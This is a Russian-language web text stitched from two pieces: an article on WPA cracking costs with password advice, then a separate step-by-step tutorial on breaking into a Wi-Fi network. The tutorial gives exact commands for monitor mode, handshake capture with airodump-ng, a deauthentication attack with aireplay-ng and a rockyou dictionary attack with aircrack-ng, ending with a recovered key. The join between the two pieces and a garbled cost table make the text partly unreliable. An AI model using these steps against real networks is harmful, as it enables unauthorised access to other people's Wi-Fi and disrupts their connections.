К сожалению, большинство из нас использует пароли, в которые включены слова. Они, как известно, уязвимы к "словарным" атакам. Количество слов в разговорном английском составляет десятки тысяч. При использовании одной GeForce GTX 590 скорость перебора может достигать 50000 вариантов пароля в секунду; а если учитывать, что слова в составе пароле при взломе играют ту же роль, что и символы, то можно делать определённые выводы.

Если вы хотите сделать свою сеть безопасной, то нужно избегать следующего:

• Не используйте в составе пароля слова из словаря. Окфордский академический словарь содержит 300000 статей, это не считая слов в текущем использовании, устаревших и производных. GeForce GTX 590 или Radeon HD 6990 легко справляется с этим;
• Не добавляйте цифры в конце пароля. Добавление "1" в конце пароля не делает его более безопасным;
• Избегайте использования двойных слов или простой замены букв. Вариант "passwordpassword" всего лишь удваивает количество слов, которые нужно найти при "словарной" атаке. Да и p@55w0rd – не самый безопасный вариант пароля: в словарные базы занесены подобные распространённые варианты;
• Избегайте клавиатурных последовательностей при вводе пароля. Сочетания, подобные QWERTY, как правило, уже есть в словаре, занести их туда несложно;
• Избегайте числовых паролей. Число 314159, может быть, легко запомнить, но и взломать такой пароль не составит большого труда;
• Избегайте всего, что взято из окружения: социальных номеров, телефонных данных, дат рождения и прочего. Сегодня большая часть такой информации является достоянием общественности, тем более, если у вас есть аккаунт на Facebook или Twitter.

При расчёте "на среднего хакера" можно сказать, что система защиты WPA построена на удивление хорошо. Даже при использовании коротких или случайных паролей скорости перебора может не хватить, чтобы провести удачную атаку.

Реальную угрозу представляет, таким образом, распределение вычислений. При использовании четырёх видеокарт Radeon HD 6990, скорость перебора вариантов может достигать полумиллиона вариантов пароля в секунду. Правда, их стоимость составляет порядка $3000. Другой способ предполагает настройку Pyrit: за $8 можно арендовать 10 кластеров EC2, что даст ту же производительность. Есть и третий способ: ручное управление рабочей нагрузкой при использовании нескольких серверов.

Впрочем, больше тревожит не производительность вычислений, а низкая стоимость операции. Хакер Moxie Marlinspike открыто предлагает услугу под названием WPACracker, которая позволяет проводить взлом WPA - сетей "в четыре касания" посредством использования 400 кластеров с "облака" на Amazon. Её использование позволяет осуществить перебор 135 миллионов "словарных" паролей в течение 20 минут. Скорость составит 112500 вариантов пароля в секунду (такая же, как при использовании одной GeForce GTX 590), а стоимость операции - всего $17,5.

Общее время поиска из расчёта 1 миллион паролей WPA/с (Стоимость использования EC2 Reserved Rate)	1...4 - значные пароли	1...6 - значные пароли	1...8 - значные пароли	1...12 - значные пароли
Цифры		Мгновение. Примерная стоимость: $0.74		12.75 дней. Примерная стоимось: $226
Нижний регистр	Мгновение. Примерная стоимость: $0.74	5 минут. Примерная стоимость: $0.74	2.5 дня. Примерная стоимость: $44.40	3 147 лет
Буквы и цифры	Мгновение. Примерная стоимость: $0.74	16 часов. Примерная стоимость: $11.84	7 лет	103 981 388 лет
Символы ANSCII	2 минуты. Примерная стоимость: $0.74	9 дней. Примерная стоимость: $159,84	231 год	До следующего большого взрыва

Томас Рот, эксперт по вопросам безопасности, который занимался настройкой Sony PlayStation Network, возможно, единственный человек, который публично продемонстрировал, как производится взлом WPA - сети при распределении вычислений. Он провел оптимизацию рабочей нагрузки на 10 кластерах EC2 и при разделении нагрузки между тремя рабочими станциями производительность достигала 1 миллионов вариантов пароля в секунду. Того же самого результата можно достичь, потратив $60 на аренду 20 кластеров. Единственное препятствие - оптимизация кода в "облаке" Amazon.

Вычислительные облачные сервисы, такие как EC2 от Amazon, первоначально были созданы для того, чтобы помочь ученым решать сложные вычислительные задачи, избегая затрат на создание мощных серверных баз. Но столь ли важно, что может представлять из себя сервис, если мы знаем, на что он способен в действительности? Если кто-то действительно хочет взломать вашу сеть, то EC2 к его услугам, и надёжный пароль - единственное, что может послужить защитой.

Кажется, что это достаточная причина для принятия на вооружение хорошей стратегии ввода паролей. Использование алфавитно-цифровых паролей в WPA - сетях очень негативно сказывается на безопасности. Сколько людей не меняет паролей, которые стоят на роутерах по умолчанию? Например, устройства линейки U-verse от AT&T (как 2Wirexxx, где х - это номер) поставляются с 10-значными паролями по умолчанию. Время на взлом такой системы при использовании двух видеокарт Radeon HD 6990 составит каких-то 14 часов.

Помимо использования уникального идентификатора SSID, пароль должен соответствовать следующим требованиям:

• Полностью случайный набор символов;
• Не меньше, чем 8 символов;
• Хотя бы один символ верхнего регистра;
• Хотя бы один символ нижнего регистра;
• Хотя бы один специальный символ (как @ или!);
• Хотя бы одна цифра.

Сети, работающие в ИТ-сфере, лучше дополнительно оборудовать сервером аутентификации, который добавляет ещё один уровень безопасности с мастером ключей, недоступным для пользователя, который будет генерировать их в динамическом режиме. В этом случае ключи будут постоянно обновляться, что бесконечно усложнит задачу взлома сети. И тогда стоит переключиться на другие вопросы безопасности, связанные с подкупом сотрудников или физической краже оборудования.

Перспективы

Вопросы, связанные с безопасностью данных, зачастую настолько погружают в себя, что пользователь забывает о том, есть ли у него вообще что красть.

Конечно, у каждого имеется информация приватного характера, общий доступ к которой нежелателен. Для её охраны достаточно минимальных усилий: большинство злоумышленников, которым интересны такие взломы, не станет тратить время на взлом, если увидит, что точка доступа защищена. Пользователи на форуме Nutsembler высказывали мнению, что до сих пор 10-20% сетей используют протокол шифрования WEP. И именно они, скорее всего, станут целью для охотников за свободным доступом. Несколько часов, дней или лет, которые нужны, чтобы взломать сеть с WPA - шифрованием, отпугнут всякого.

Подавляющее большинство злоумышленников не станет атаковать сеть с протоколом, который известен как хорошо защищённый. Можно провести аналогию со средствами физической охраны: пневматическое оружие не зря считается лучшим оружием для обороны, так как простой звук выстрела наверняка отпугнёт недоброжелателей.

Кроме того, не все вообще согласятся с тем, что необходимо принимать меры по обеспечению безопасности. Многие люди специально держат свои Wi-Fi сети открытыми. На TorrentFreak был пост, где высказывались сомнения в ответственности владельца сети за действия других пользователей. Вот цитата оттуда: "То, что некоторые сети работают без применения протоколов безопасности, не всегда является следствием технической неграмотности. Некоторые из нас оставляют свои точки доступа открытыми для друзей и других людей из чувства солидарности". Это хорошее намерение, однако при этом нужно помнить, что, используя такие сети, вы становитесь на одну планку с нарушителями законов о защите информации.

Использование беспроводных сетей Wi-Fi в настоящее время стало очень распространённым. Многие пользователи задумываются о безопасности своих сетей и компьютеров, иногда у них возникают вопросы, как взламывают Wi-Fi, насколько эта угроза реальна?

В этой заметке я предлагаю обычным пользователям, возможно, далёким от вопросов аудита безопасности беспроводных сетей Wi-Fi, посмотреть на их Wi-Fi сеть глазами хакера и даже задаться вопросом, как взломать Wi-Fi ?

Термины Wi-Fi сетей

Точка Доступа (также Access Point ), сокращённо ТД , AP - устройство, которое обеспечивает работу сети Wi-Fi, к нему подключаются Клиенты. Чаще всего точками доступа являются роутеры.

Клиент (Станция ) - устройство, которое подключается к Точке Доступа. Чаще всего это компьютеры, ноутбуки, сотовые телефоны и т.д.

ESSID и SSID - это имена беспроводных Wi-Fi сетей - именно их вы видите, когда выбираете к какой сети подключиться. Строго говоря, ESSID и SSID это не одно и то же, но в аудите Wi-Fi эти термины часто используются как взаимозаменяемые. На скриншоте ниже ESSID (именами сетей) являются MiAl, wifi88 и т.д.:

Рукопожатие (также хэндшейк , handshake ) - данные, которыми обмениваются Станция и Точка Доступа в момент создания Wi-Fi соединения. Эти данные содержат информацию, позволяющую подобрать пароль от сети Wi-Fi.

Брут-форс (также полный перебор ) - метод атаки на пароль, заключающийся в переборе всех возможных вариантов пароля. Требует много времени и вычислительных ресурсов.

Перебор по словарю (атака по словарю ) - метод атаки на пароль, заключающийся в переборе часто встречающихся вариантов пароля. Имеет хорошее соотношение затраченных ресурсов к полученным результатам.

Онлайн перебор пароля Wi-Fi - метод подбора пароля, который заключается в подключении к Точке Доступа с различными кандидатами в пароли. Практически не применяется из-за крайне низкой скорости перебора.

Офлайн перебор пароля Wi-Fi - метод подбора пароля, который заключается в захвате Рукопожатия и подборе такого пароля, который бы соответствовал этому рукопожатию. Этот подбор не требует подключения к Точке Доступа и выполняется на много порядков быстрее, чем онлайн перебор. Также он может выполняться на вычислительных мощностях видеокарт, что увеличивает скорость перебора ещё на несколько порядков.

WPA и WPA2 - технология защищённого доступа к Wi-Fi, пришла на смену устаревшей технологии WEP.

Беспроводная Wi-Fi карта (или беспроводной Wi-Fi адаптер ) - любая сетевая карта, способная подключаться к сети Wi-Fi. В ноутбуках и телефонах они встроены внутрь корпуса, в настольных компьютерах обычно представляют собой внешнее устройство, подключаемое по USB.

Режим монитора (Monitor Mode ) - свойство некоторых беспроводных адаптеров принимать пакеты данных, которые предназначены не только для них, но и для других беспроводных устройств.

Сетевой интерфейс - имя, условное обозначение в Linux сетевых карт/адаптеров.

Канал сети Wi-Fi - условное цифровое обозначение частоты, на которой в данный момент работает Точка Доступа.

Что необходимо для взлома Wi-Fi

• Компьютер, на который можно установить Linux
• Специализированное программное обеспечение, для Linux оно является свободным (т.е. распространяется бесплатно и у него открыт исходный код)
• Беспроводная Wi-Fi карта, которая поддерживает режим монитора. актуальных карт.
• Соответствующие знания и навыки - это вы найдёте в данной статье.

Wi-Fi карты с поддержкой режима монитора имеются в свободной продаже, их цена соответствует ценам других беспроводным картам с аналогичными характеристиками. В моём ноутбуке встроенная карта оказалась с поддержкой режима монитора - т.е. это не является редкостью и их могут достать любые желающие.

Специализированное ПО для аудита Wi-Fi сетей, как уже было сказано, распространяется свободно, по умолчанию оно присутствует в специализированных дистрибутивах, например, в (по ссылке общая информация и инструкции по установке).

Как можно убедиться, все компоненты необходимые для взлома Wi-Fi являются весьма доступными.

Все дальнейшие действия выполняются в Kali Linux.

Перевод Wi-Fi адаптера в режим монитора

По умолчанию беспроводные адаптеры находятся в «управляемом» (managed) режиме. Этот режим позволяет подключаться к Точке Доступа в качестве обычного Клиента.

Режим монитора (monitor) предназначен для анализа Wi-Fi сетей. В этом режиме беспроводная карта принимает фреймы (их ещё называют кадры) от любых источников, находящихся на том же канале.

Поскольку нам нужно захватить рукопожатие, которое состоит из данных, которые Станция отправляет Точке Доступа и Точка Доступа отправляет Станции (т.е. которые ни на каком этапе не предназначены для нас), то нам необходимо перевести нашу Wi-Fi карту в режим монитора, чтобы она была способна увидеть эти данные и сохранить их для дальнейшей обработки.

Чтобы ввести команды для перевода Wi-Fi адаптера в режим монитора, нам нужно узнать имя беспроводного интерфейса. Для этого откройте консоль и введите команду:

Sudo iw dev

Имя беспроводного интерфейса указано в строке со словом Interface , т.е. в моём случае именем является wlan0 . Запоминаем это значение, поскольку в дальнейшем оно нам понадобиться.

Режим монитора не является чем-то обычным для операционной системы, поэтому некоторые программы без спроса, молча переводят Wi-Fi адаптер в управляемый режим. Нам это может помешать, поэтому следующими двумя командами мы закрываем программы, которые могут нам воспрепятствовать:

Sudo systemctl stop NetworkManager sudo airmon-ng check kill

Теперь, наконец, мы можем перевести беспроводную карту в режим монитора. Для этого выполните последовательность команд

Sudo ip link set <ИНТЕРФЕЙС> down sudo iw <ИНТЕРФЕЙС> set monitor control sudo ip link set <ИНТЕРФЕЙС> up

заменив <ИНТЕРФЕЙС> на действительное имя вашего беспроводного интерфейса (у меня это wlan0 ):

Sudo ip link set wlan0 down sudo iw wlan0 set monitor control sudo ip link set wlan0 up

Кажется, что ничего не произошло, но набрав команду

Sudo iw dev

Мы увидим примерно следующее:

В ней строка type monitor говорит о том, что наша беспроводная карта в режиме монитора.

Что такое рукопожатие (хэндшэйк)

Как уже было сказано, рукопожатие - это данные, которые в несколько этапов передаются между Станцией и Точкой доступа в тот момент, когда Станция подключается к Точке Доступа. Это означает, что для захвата рукопожатия нам нужно переключиться на канал, на котором работает Точка Доступа, для прослушивания радиосигналов и дождаться момента, когда Станция подключается к ней. Поскольку ожидание может затянуться, что применяется приём, называемый Атака Деаутентификация, который заключается в принудительно сбросе Wi-Fi соединения между Точкой Доступа и Станцией. Сразу после такого отключения, Станция пытается подключиться вновь, а мы в этот момент захватываем рукопожатие.

К сожалению, этот метод не работает, если к Точке Доступа никто не подключён.

Обзор Wi-Fi сетей

Чтобы атаковать Wi-Fi сеть нам нужно знать некоторые её характеристики. Чтобы получить список всех доступных в диапазоне досягаемости Wi-Fi сетей выполните команду:

Sudo airodump-ng wlan0

Обратите внимание, что если у вас другое имя беспроводного интерфейса, то вместо wlan0 вам нужно вписать это имя.

Описанная атака применима только для сетей с защитой WPA2 или WPA - таких подавляющее большинство.

Будет выведен похожий список сетей:

Когда вы увидите в списке сеть, которую хотите атаковать, то остановите программу, для этого нажмите CTRL+c .

Предположим, меня интересует сеть с ESSID (именем) dlink . Как видно из скриншота, её характеристиками являются: BSSID - это 00:1E:58:C6:AC:FB, она использует WPA2, работает на шестом канале. Также ненулевое значение #Data (захваченные данные, отправляемые это ТД) позволяет предположить, что к ней подключена одна или более станций.

Для захвата рукопожатия используется команда следующего вида:

Sudo airodump-ng -c КАНАЛ --bssid MAC_АДРЕС -w ФАЙЛ ИНТЕРФЕЙС

• КАНАЛ - это канал, на котором работает ТД
• MAC_АДРЕС - это BSSID атакуемой ТД
• ФАЙЛ - имя файла, куда будет записано рукопожатие
• ИНТЕРФЕЙС

Для моих данных команда выглядит так:

Sudo airodump-ng -c 6 --bssid 00:1E:58:C6:AC:FB -w capture wlan0

На следующем скриншоте вновь видна интересующая нас ТД, а также теперь виден раздел со станциями:

В полном списке ТД раздел со станциями также присутствовал, но уходил за нижний край экрана, поэтому на скриншот не попал.

Для станции мы в поле BSSID мы можем увидеть значение, которое соответствует BSSID Точки Доступа, т.е. 00:1E:58:C6:AC:FB, это означает, что в данный момент эта Станция подключена к интересующей нас ТД. Теперь имеется два варианта:

1) ждать пока Станция отсоединится и вновь подключится к ТД по естественным причинам

2) выполнить атаку деаутентификация для ускорения процесса

Выполнение атаки деаутентификация

Для выполнения деаутентификации, не прекращая записи трафика, запущенного на предыдущем этапе, откройте новое окно консоли и введите туда команду вида:

Sudo aireplay-ng -0 3 -a MAC_АДРЕС ИНТЕРФЕЙС

• MAC_АДРЕС - это BSSID атакуемой ТД
• ИНТЕРФЕЙС - имя беспроводного интерфейса в режиме монитора

В моём случае команда выглядит так:

Sudo aireplay-ng -0 3 -a 00:1E:58:C6:AC:FB wlan0

Программа выведет примерно следующее:

08:17:30 Waiting for beacon frame (BSSID: 00:1E:58:C6:AC:FB) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c ). 08:17:30 Sending DeAuth to broadcast -- BSSID: 08:17:30 Sending DeAuth to broadcast -- BSSID: 08:17:31 Sending DeAuth to broadcast -- BSSID:

А в правом верхнем углу экрана для захвата данных появится новая запись:

WPA handshake: 00:1E:58:C6:AC:FB

Она означает, что рукопожатие успешно захвачено.

Атака по словарю на пароль Wi-Fi

Теперь нам нужно запустить перебор данных.

Подготовим словарь:

Cp /usr/share/wordlists/rockyou.txt.gz . gunzip rockyou.txt.gz cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt

Файл словаря в этом случае называется newrockyou.txt .

Чтобы узнать имя захваченного рукопожатия выполните команду:

Ls -l capture*

При этом будет выведено что-то вроде следующего (записей может быть больше, если вы неоднократно захватывали рукопожатия):

Rw-r--r-- 1 root root 73164 сен 30 08:24 capture-01.cap -rw-r--r-- 1 root root 478 сен 30 08:24 capture-01.csv -rw-r--r-- 1 root root 583 сен 30 08:24 capture-01.kismet.csv -rw-r--r-- 1 root root 2766 сен 30 08:24 capture-01.kismet.netxml

Нас интересует только файл capture-01.cap - именно он содержит рукопожатие.

Для перебора по словарю используется следующая команда:

Aircrack-ng -w ФАЙЛ_СЛОВАРЯ ФАЙЛ_ЗАХВАТА

Итак, в моём случае точная команда следующая:

Aircrack-ng -w newrockyou.txt capture-01.cap

Эта команда запускает подбор пароля, в процессе перебора показывается следующее окно:

Пароль подобран:

Об этом говорит запись KEY FOUND! [ pattayateam ] , в которой паролем от Wi-Fi сети является pattayateam. Используя этот пароль можно подключиться к беспроводной точке доступа с любого устройства (компьютера, телефона) как это делают другие легитимные пользователи.

Заключение

Как можно убедиться, взлом Wi-Fi не является чем-то исключительно сложным, хотя и требует знания некоторых команд Linux. Здесь показан только один пример из множества вариаций атаки на Wi-Fi. Если вас заинтересовала тема аудита беспроводных сетей, то обратитесь к книге « ».